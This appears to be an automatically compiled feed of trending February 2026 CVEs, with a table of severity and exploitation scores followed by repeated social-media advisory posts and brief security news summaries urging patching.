##
Updated at UTC 2026-02-17T15:11:02.024808
| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-1731 | 9.8 | 61.03% | 2 | 3 | template | 2026-02-17T13:40:10.320000 | BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote |
| CVE-2026-2247 | 0 | 0.14% | 2 | 0 | 2026-02-17T12:16:15.443000 | SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generat | |
| CVE-2025-7631 | 8.6 | 0.03% | 2 | 0 | 2026-02-17T12:16:15.090000 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2026-25903 | 0 | 0.03% | 2 | 0 | 2026-02-17T11:16:05.500000 | Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configur | |
| CVE-2026-0829 | 0 | 0.02% | 2 | 0 | 2026-02-17T07:16:31.883000 | The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenti | |
| CVE-2026-2592 | 7.7 | 0.07% | 4 | 1 | 2026-02-17T05:16:17.430000 | The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Impro | |
| CVE-2026-26220 | 0 | 0.55% | 2 | 0 | 2026-02-17T03:16:01.893000 | LightLLM version 1.1.0 and prior contain an unauthenticated remote code executio | |
| CVE-2025-12062 | 8.8 | 0.06% | 2 | 0 | 2026-02-17T00:30:19 | The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & | |
| CVE-2026-2564 | 8.1 | 0.04% | 2 | 1 | 2026-02-16T17:18:09.150000 | A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T | |
| CVE-2026-1333 | 7.8 | 0.01% | 2 | 0 | 2026-02-16T15:32:54 | A Use of Uninitialized Variable vulnerability affecting the EPRT file reading pr | |
| CVE-2026-1046 | 7.6 | 0.03% | 4 | 0 | 2026-02-16T15:32:54 | Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links | |
| CVE-2026-1334 | 7.8 | 0.01% | 2 | 0 | 2026-02-16T14:16:18.160000 | An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in | |
| CVE-2026-2451 | None | 0.05% | 2 | 0 | 2026-02-16T12:32:02 | Emails sent by pretix can utilize placeholders that will be filled with customer | |
| CVE-2026-2452 | 0 | 0.05% | 2 | 0 | 2026-02-16T11:15:56.420000 | Emails sent by pretix can utilize placeholders that will be filled with customer | |
| CVE-2026-26369 | 9.8 | 0.04% | 4 | 0 | 2026-02-15T18:30:25 | eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerabi | |
| CVE-2026-26366 | 9.8 | 0.07% | 4 | 0 | 2026-02-15T18:30:24 | eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user | |
| CVE-2025-32062 | 8.8 | 0.02% | 6 | 0 | 2026-02-15T12:30:34 | The specific flaw exists within the Bluetooth stack developed by Alps Alpine of | |
| CVE-2025-32058 | 9.4 | 0.01% | 4 | 0 | 2026-02-15T12:30:34 | The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communica | |
| CVE-2025-32061 | 8.8 | 0.02% | 2 | 0 | 2026-02-15T12:30:34 | The specific flaw exists within the Bluetooth stack developed by Alps Alpine of | |
| CVE-2025-32059 | 8.8 | 0.02% | 2 | 0 | 2026-02-15T12:30:25 | The specific flaw exists within the Bluetooth stack developed by Alps Alpine of | |
| CVE-2026-1750 | 8.8 | 0.03% | 2 | 0 | 2026-02-15T06:31:38 | The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerab | |
| CVE-2026-1490 | 9.8 | 0.08% | 4 | 1 | 2026-02-15T04:15:53.783000 | The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vu | |
| CVE-2026-2441 | 8.8 | 0.03% | 5 | 1 | 2026-02-13T21:43:11.137000 | Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote a | |
| CVE-2025-69770 | 10.0 | 0.09% | 1 | 0 | 2026-02-13T21:43:11.137000 | A zip slip vulnerability in the /DesignTools/SkinList.aspx endpoint of MojoPorta | |
| CVE-2026-1358 | 9.8 | 0.13% | 2 | 0 | 2026-02-13T14:23:48.007000 | Airleader Master versions 6.381 and prior allow for file uploads without restri | |
| CVE-2024-43468 | 9.8 | 87.46% | 2 | 3 | 2026-02-13T14:04:05.243000 | Microsoft Configuration Manager Remote Code Execution Vulnerability | |
| CVE-2026-22903 | 9.8 | 0.57% | 1 | 0 | 2026-02-09T16:08:35.290000 | An unauthenticated remote attacker can send a crafted HTTP request containing an | |
| CVE-2026-1868 | 9.9 | 0.03% | 1 | 0 | 2026-02-09T16:08:35.290000 | GitLab has remediated a vulnerability in the Duo Workflow Service component of G | |
| CVE-2025-64155 | 9.8 | 0.04% | 2 | 4 | 2026-01-20T16:16:06.200000 | An improper neutralization of special elements used in an os command ('os comman | |
| CVE-2026-20965 | 7.5 | 0.03% | 2 | 0 | 2026-01-16T16:23:11.237000 | Improper verification of cryptographic signature in Windows Admin Center allows | |
| CVE-2025-59922 | 7.2 | 0.05% | 2 | 0 | 2026-01-14T21:38:33.547000 | An improper neutralization of special elements used in an SQL command ('SQL Inje | |
| CVE-2025-6264 | 5.5 | 0.06% | 2 | 1 | 2025-10-23T01:00:00.913000 | Velociraptor allows collection of VQL queries packaged into Artifacts from endpo | |
| CVE-2026-02447 | 0 | 0.00% | 1 | 0 | N/A |
updated 2026-02-17T13:40:10.320000
2 posts
3 repos
https://github.com/cybrdude/cve-2026-1731-scanner
Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.
##Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.
##updated 2026-02-17T12:16:15.443000
2 posts
CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! https://radar.offseq.com/threat/cve-2026-2247-cwe-89-improper-neutralization-of-sp-b8f5f03e #OffSeq #SQLi #InfoSec #EduSec
##CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! https://radar.offseq.com/threat/cve-2026-2247-cwe-89-improper-neutralization-of-sp-b8f5f03e #OffSeq #SQLi #InfoSec #EduSec
##updated 2026-02-17T12:16:15.090000
2 posts
🟠 CVE-2025-7631 - High (8.6)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7631/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-7631 - High (8.6)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7631/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T11:16:05.500000
2 posts
🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! https://radar.offseq.com/threat/cve-2026-25903-cwe-862-missing-authorization-in-ap-96d68c81 #OffSeq #NiFi #infosec #CVE202625903
##🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! https://radar.offseq.com/threat/cve-2026-25903-cwe-862-missing-authorization-in-ap-96d68c81 #OffSeq #NiFi #infosec #CVE202625903
##updated 2026-02-17T07:16:31.883000
2 posts
🔒 CVE-2026-0829 (HIGH): Frontend File Manager plugin ≤23.5 for WordPress has missing authorization, letting unauthenticated users send site emails & access files. Remove or restrict plugin use until patched! https://radar.offseq.com/threat/cve-2026-0829-cwe-862-missing-authorization-in-fro-323c4855 #OffSeq #WordPress #Vuln #BlueTeam
##🔒 CVE-2026-0829 (HIGH): Frontend File Manager plugin ≤23.5 for WordPress has missing authorization, letting unauthenticated users send site emails & access files. Remove or restrict plugin use until patched! https://radar.offseq.com/threat/cve-2026-0829-cwe-862-missing-authorization-in-fro-323c4855 #OffSeq #WordPress #Vuln #BlueTeam
##updated 2026-02-17T05:16:17.430000
4 posts
1 repos
🛡️ CVE-2026-2592 (HIGH, CVSS 7.7): Zarinpal Gateway for WooCommerce has improper access control — orders can be marked as paid via reused authority tokens. All versions affected. Audit callback validation & monitor for fraud. Details: https://radar.offseq.com/threat/cve-2026-2592-cwe-284-improper-access-control-in-z-22959dc1 #OffSeq #WooCommerce #WordPress
##🟠 CVE-2026-2592 - High (7.7)
The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' fail...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2592/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🛡️ CVE-2026-2592 (HIGH, CVSS 7.7): Zarinpal Gateway for WooCommerce has improper access control — orders can be marked as paid via reused authority tokens. All versions affected. Audit callback validation & monitor for fraud. Details: https://radar.offseq.com/threat/cve-2026-2592-cwe-284-improper-access-control-in-z-22959dc1 #OffSeq #WooCommerce #WordPress
##🟠 CVE-2026-2592 - High (7.7)
The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' fail...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2592/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T03:16:01.893000
2 posts
⚠️ CRITICAL: CVE-2026-26220 in ModelTC LightLLM ≤1.1.0 allows unauth RCE via unsafe pickle deserialization on WebSocket endpoints. Restrict PD master node access & monitor for attacks. No patch yet — act now! https://radar.offseq.com/threat/cve-2026-26220-cwe-502-deserialization-of-untruste-3d57a118 #OffSeq #infosec #CVE202626220 #rce
##⚠️ CRITICAL: CVE-2026-26220 in ModelTC LightLLM ≤1.1.0 allows unauth RCE via unsafe pickle deserialization on WebSocket endpoints. Restrict PD master node access & monitor for attacks. No patch yet — act now! https://radar.offseq.com/threat/cve-2026-26220-cwe-502-deserialization-of-untruste-3d57a118 #OffSeq #infosec #CVE202626220 #rce
##updated 2026-02-17T00:30:19
2 posts
🟠 CVE-2025-12062 - High (8.8)
The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it poss...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-12062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-12062 - High (8.8)
The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it poss...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-12062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-16T17:18:09.150000
2 posts
1 repos
🛑 CRITICAL vuln (CVE-2026-2564) in Intelbras VIP 3260 Z IA (2.840.00IB005.0.T): Weak password recovery via /OutsideCmd enables remote attack. No user interaction needed. Restrict access, monitor, and await patch. https://radar.offseq.com/threat/cve-2026-2564-weak-password-recovery-in-intelbras--15b4ad92 #OffSeq #CVE20262564 #IoTSecurity
##🛑 CRITICAL vuln (CVE-2026-2564) in Intelbras VIP 3260 Z IA (2.840.00IB005.0.T): Weak password recovery via /OutsideCmd enables remote attack. No user interaction needed. Restrict access, monitor, and await patch. https://radar.offseq.com/threat/cve-2026-2564-weak-password-recovery-in-intelbras--15b4ad92 #OffSeq #CVE20262564 #IoTSecurity
##updated 2026-02-16T15:32:54
2 posts
CVE-2026-1333 (HIGH, CVSS 7.8): SOLIDWORKS eDrawings 2025 – 2026 SP0 vulnerable to code execution via crafted EPRT files. No exploits yet, but patch and restrict file handling! https://radar.offseq.com/threat/cve-2026-1333-cwe-457-use-of-uninitialized-variabl-1f2a1adb #OffSeq #vuln #SOLIDWORKS #infosec
##CVE-2026-1333 (HIGH, CVSS 7.8): SOLIDWORKS eDrawings 2025 – 2026 SP0 vulnerable to code execution via crafted EPRT files. No exploits yet, but patch and restrict file handling! https://radar.offseq.com/threat/cve-2026-1333-cwe-457-use-of-uninitialized-variabl-1f2a1adb #OffSeq #vuln #SOLIDWORKS #infosec
##updated 2026-02-16T15:32:54
4 posts
🟠 CVE-2026-1046 - High (7.6)
Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1046/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1046 - High (7.6)
Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1046/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1046 - High (7.6)
Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1046/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1046 - High (7.6)
Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1046/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-16T14:16:18.160000
2 posts
⚠️ CVE-2026-1334: HIGH-severity out-of-bounds read in SOLIDWORKS eDrawings (2025 SP0/2026 SP0). Exploiting crafted EPRT files can enable code execution. Patch when released, restrict sources, use sandboxing. No known exploits yet. https://radar.offseq.com/threat/cve-2026-1334-cwe-125-out-of-bounds-read-in-dassau-5f48827a #OffSeq #SOLIDWORKS #Infosec
##⚠️ CVE-2026-1334: HIGH-severity out-of-bounds read in SOLIDWORKS eDrawings (2025 SP0/2026 SP0). Exploiting crafted EPRT files can enable code execution. Patch when released, restrict sources, use sandboxing. No known exploits yet. https://radar.offseq.com/threat/cve-2026-1334-cwe-125-out-of-bounds-read-in-dassau-5f48827a #OffSeq #SOLIDWORKS #Infosec
##updated 2026-02-16T12:32:02
2 posts
⚠️ CVE-2026-2451 (HIGH): pretix-doistep 1.0.0 allows backend users to abuse email template placeholders to exfiltrate config, DB passwords & API keys. Rotate creds, audit templates & restrict edit rights ASAP. https://radar.offseq.com/threat/cve-2026-2451-cwe-627-dynamic-variable-evaluation--3e2879f1 #OffSeq #Vulnerability #pretix #InfoSec
##⚠️ CVE-2026-2451 (HIGH): pretix-doistep 1.0.0 allows backend users to abuse email template placeholders to exfiltrate config, DB passwords & API keys. Rotate creds, audit templates & restrict edit rights ASAP. https://radar.offseq.com/threat/cve-2026-2451-cwe-627-dynamic-variable-evaluation--3e2879f1 #OffSeq #Vulnerability #pretix #InfoSec
##updated 2026-02-16T11:15:56.420000
2 posts
🔒 CVE-2026-2452 (HIGH): pretix-newsletter 1.0.0 & 2.0.0 let backend users leak sensitive data by abusing placeholders in email templates. Rotate credentials, restrict edit rights, and monitor changes! More: https://radar.offseq.com/threat/cve-2026-2452-cwe-627-dynamic-variable-evaluation--1e0b8836 #OffSeq #Vuln #pretix #Infosec
##🔒 CVE-2026-2452 (HIGH): pretix-newsletter 1.0.0 & 2.0.0 let backend users leak sensitive data by abusing placeholders in email templates. Rotate credentials, restrict edit rights, and monitor changes! More: https://radar.offseq.com/threat/cve-2026-2452-cwe-627-dynamic-variable-evaluation--1e0b8836 #OffSeq #Vuln #pretix #Infosec
##updated 2026-02-15T18:30:25
4 posts
🔴 CVE-2026-26369 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26369/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26369 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26369/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26369 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26369/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26369 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26369/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T18:30:24
4 posts
🔴 CVE-2026-26366 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26366/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26366 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26366/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26366 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26366/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26366 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26366/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T12:30:34
6 posts
🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T12:30:34
4 posts
🔴 CVE-2025-32058 - Critical (9.3)
The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32058/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-32058 - Critical (9.3)
The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32058/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-32058 - Critical (9.3)
The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32058/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-32058 - Critical (9.3)
The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32058/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T12:30:34
2 posts
🟠 CVE-2025-32061 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32061/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32061 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32061/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T12:30:25
2 posts
🟠 CVE-2025-32059 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32059/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32059 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32059/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T06:31:38
2 posts
🟠 CVE-2026-1750 - High (8.8)
The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1750/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1750 - High (8.8)
The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1750/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T04:15:53.783000
4 posts
1 repos
Critical CleanTalk Plugin Vulnerability Allows WordPress Site Takeover via DNS Spoofing
A critical vulnerability in the CleanTalk WordPress plugin (CVE-2026-1490) allows unauthenticated attackers to bypass authorization via Reverse DNS spoofing and install arbitrary plugins, leading to full site takeover.
**If you are using ""Spam protection, Anti-Spam, FireWall by CleanTalk", update ASAP. Never rely on DNS records for authentication because they are easily spoofed by attackers.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-cleantalk-plugin-vulnerability-allows-wordpress-site-takeover-via-dns-spoofing-v-h-r-b-n/gD2P6Ple2L
🔴 CVE-2026-1490 - Critical (9.8)
The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Critical CleanTalk Plugin Vulnerability Allows WordPress Site Takeover via DNS Spoofing
A critical vulnerability in the CleanTalk WordPress plugin (CVE-2026-1490) allows unauthenticated attackers to bypass authorization via Reverse DNS spoofing and install arbitrary plugins, leading to full site takeover.
**If you are using ""Spam protection, Anti-Spam, FireWall by CleanTalk", update ASAP. Never rely on DNS records for authentication because they are easily spoofed by attackers.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-cleantalk-plugin-vulnerability-allows-wordpress-site-takeover-via-dns-spoofing-v-h-r-b-n/gD2P6Ple2L
🔴 CVE-2026-1490 - Critical (9.8)
The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-13T21:43:11.137000
5 posts
1 repos
Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.
##Zero-Day Chaos: Actively Exploited Google Chrome Flaw Triggers Emergency Global Patch
Introduction: A Silent Browser Bug Turns Into a Global Security Emergency A critical security vulnerability in Google Chrome has escalated into an active, real-world threat, forcing an emergency response from the browser’s developers. The flaw, tracked as CVE-2026-2441, sits deep inside Chrome’s CSS engine and has already been exploited in the wild, raising alarms across the…
##Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.
##Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.
